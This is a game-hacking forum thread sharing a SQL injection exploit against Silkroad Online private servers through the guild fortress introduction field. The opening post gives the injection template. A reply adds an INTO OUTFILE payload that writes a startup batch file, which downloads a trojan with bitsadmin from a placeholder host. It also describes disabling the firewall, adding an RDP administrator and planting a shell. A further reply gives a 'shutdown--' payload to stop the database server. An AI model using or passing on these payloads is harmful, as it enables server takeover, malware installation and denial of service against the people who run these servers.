[EXPLOIT] SQL Inject Inside SRO

Sql Injection Inside Game :V
Editing "About Guild"

-- Requirements: Own Fortress and be master.

work like this:

a'; write query here ; Update _SiegeFortress SET Introduction = 'Introduction Here

Then Click in Confirm

Example
[Only registered and activated users can see links. Click Here To Register...]

Enjoy :V

no offense but just useless

Quote:

Originally Posted by Jimmy* no offense but just useless

Useless?

a'; SELECT 'bitsadmin.exe /transfer "bla" "http://download.url/bigtrojaner.exe" "C:\Users\Administrator\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\trojan.exe"' into outfile 'C:\Users\Administrator\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\autostart.bat';

- Now wait until they restart the Server and u got full Access of the Server.
- If they use GameServer and Webserver with same Server u can upload easy a shell and got access faster.
- You can create a bat file who deactivate the Firewall, adds a new Administrator with RemoteDesktop rights and after restart u can access throug RDP.
- You can change the whole Database, create new Admin Account ingame, change ur level, your power etc.
Yeh its useless.

Quote:

Originally Posted by FlyffServices Useless? a'; SELECT 'bitsadmin.exe /transfer "bla" "http://download.url/bigtrojaner.exe" "C:\Users\Administrator\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\trojan.exe"' into outfile 'C:\Users\Administrator\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\autostart.bat'; - Now wait until they restart the Server and u got full Access of the Server. - If they use GameServer and Webserver with same Server u can upload easy a shell and got access faster. - You can create a bat file who deactivate the Firewall, adds a new Administrator with RemoteDesktop rights and after restart u can access throug RDP. - You can change the whole Database, create new Admin Account ingame, change ur level, your power etc. Yeh its useless.

Agreed, there's a lot of opportunities to do. Even though the OS server has some built in security features compared to the client version you can still do a lot.

Quote:

Originally Posted by FlyffServices Useless? a'; SELECT 'bitsadmin.exe /transfer "bla" "http://download.url/bigtrojaner.exe" "C:\Users\Administrator\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\trojan.exe"' into outfile 'C:\Users\Administrator\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\autostart.bat'; - Now wait until they restart the Server and u got full Access of the Server. - If they use GameServer and Webserver with same Server u can upload easy a shell and got access faster. - You can create a bat file who deactivate the Firewall, adds a new Administrator with RemoteDesktop rights and after restart u can access throug RDP. - You can change the whole Database, create new Admin Account ingame, change ur level, your power etc. Yeh its useless.

I think he meant that the thread is useless since there already is one open about this exploit. :)

Obviously the exploit isn't useless at all.

dammm it was to keep in secret!

use it to disable the sql

test' shutdown--

why are you creating a thread while this was already discussed 2 weeks ago?
[Only registered and activated users can see links. Click Here To Register...]
#attentionsnitch much?

Quote:

Originally Posted by KralBoi why are you creating a thread while this was already discussed 2 weeks ago? [Only registered and activated users can see links. Click Here To Register...] #attentionsnitch much?

Can you anti this ?

#Closed

[Only registered and activated users can see links. Click Here To Register...]